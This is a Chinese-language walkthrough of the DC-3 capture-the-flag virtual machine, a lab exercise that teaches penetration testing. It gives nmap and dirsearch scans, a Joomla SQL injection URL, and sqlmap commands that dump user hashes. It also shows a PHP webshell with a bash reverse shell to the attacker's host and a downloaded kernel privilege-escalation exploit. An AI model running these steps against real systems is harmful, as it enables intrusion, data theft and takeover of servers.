靶机下载地址放在文章最后啦
一、靶机的搭建
1.打开文件夹右击使用VM虚拟机打开
2.给虚拟机取个名字(我这里就直接DC-3),选择自己虚拟机存放的位置
3.等待虚拟机的导入
4.直接打开发现报错,编辑一下虚拟机发现还是报错,这是因为我使用的17版本的需要改一下兼容性(虚拟机可能会闪退)。
5.先改兼容性再解决启动问题,选择兼容16版本的就可以了。
6.再编辑虚拟机,解决启动问题。
7.成功启动并进入靶场的登录界面(不知道密码和账号),IP也不知道是好多。
二、渗透过程
1.直接上nmap扫一下存活的IP地址
我这里IP地址有点多,13这台机子应该就是DC-3靶机IP了
nmap -sn 10.189.100.10-20
2.再用nmap扫一下开放的端口
nmap -sV -A -p- 10.189.160.13
3.发现只开放了 80端口,先访问80端口看看
4.我们使用whatweb看看网站的指纹信息,发现是Joomla框架。
whatweb -v 10.189.160.13
5.dirsearch扫一下网站目录,发现了后天登陆地址
dirsearch -u "http://10.189.160.13/"
6.访问后台登陆地址看看
7.百度一下Joomla框架有什么漏洞
8.百度里发现一篇文章,里面的SQL注入可以利用。
文章地址:https://www.cnblogs.com/arrest/articles/17660026.html
9.检查是否存在SQL注入
http://10.189.160.13/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=extractvalue(666,concat(0x3a,version(),0x3a))
10.直接上SQLmap,先爆出数据库。有选项就按Y(不要使用-- batch),耐心多等一会就爆出来了
sqlmap -u "http://10.189.160.13/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x7e,concat(0x7e,user()),0x7e)Joomla/index.php?" --dbs
11.发现了joomladb数据库,我们再爆一下joomladb里面的表。有选项就按Y
sqlmap -u "http://10.189.160.13/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x7e,concat(0x7e,user()),0x7e)Joomla/index.php?" --dbs -D joomladb --tables
12.我们继续爆表里面的字段,一路按Y,最后按1默认字典,拉一下窗口看着舒服一些。
sqlmap -u "http://10.189.160.13/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x7e,concat(0x7e,user()),0x7e)Joomla/index.php?" --dbs -D joomladb --tables -T "#__users" --dump
13.我们发现用户名是:admin 密码是加密的,使用kali中的john工具破解密码
admin $2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu
14.先使用vi编辑器把密码放在TXT文本里面,在使用john进行破解
vi passwd.txt
john passwd.txt
15.密码就是shoopy,我们登陆一下后台
16.发现一个地方可以上传webshell
17.创建一个shell.php的文件,直接写入一句话
18.使用蚁剑直接连接
http://10.189.160.13/templates/beez3/html/shell.php
19.使用whoami命令查看用户权限是www-data,我们需要提权
20.我们先反弹一下shell,在我们的shell.php插入
<?php
system ("bash -c 'bash -i >& /dev/tcp/10.189.160.1/6666 0>&1'");
?>
21.访问shell.php并在kali上面使用nc监听,再使用python反弹成交互式shell
http://10.189.160.13/templates/beez3/html/shell.php
nc -l -p 6666
22.尝试了SUID和GIT提权都没有成功,看看系统版本是多少
cat /etc/issue
23.使用searchsploit搜索工具看看有什么可以利用的漏洞,发现一个提权漏洞
searchsploit Ubuntu 16.04
24.我们 具体查看一下漏洞
searchsploit -p linux/local/39772.txt
26.可以使用溢出提权,并且告诉我们了工具的下载地址
cat /usr/share/exploitdb/exploits/linux/local/39772.txt
27.直接使用命令把工具下载到靶机中,并解压
wget https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39772.zip
28.进入解压后的39772目录,发现两个压缩包
28.使用命令直接解压exploit.tar
tar -xvf exploit.tar
29.安装文本中的提示进行提权操作
cd ebpf_mapfd_doubleput_exploit
ls
./compile.sh
./doubleput.c
30.成功拿到唯一的flag了
记得点赞+关注,关注微信公众号菜鸟学渗透,有任何问题可以后台私信我
后台回复"DC-3"即可获得靶场地址
有考取NISP一级/二级/三级、CISP-PTE/PTS等证书的可以加我好友私信我(公众号回复“加好友”)。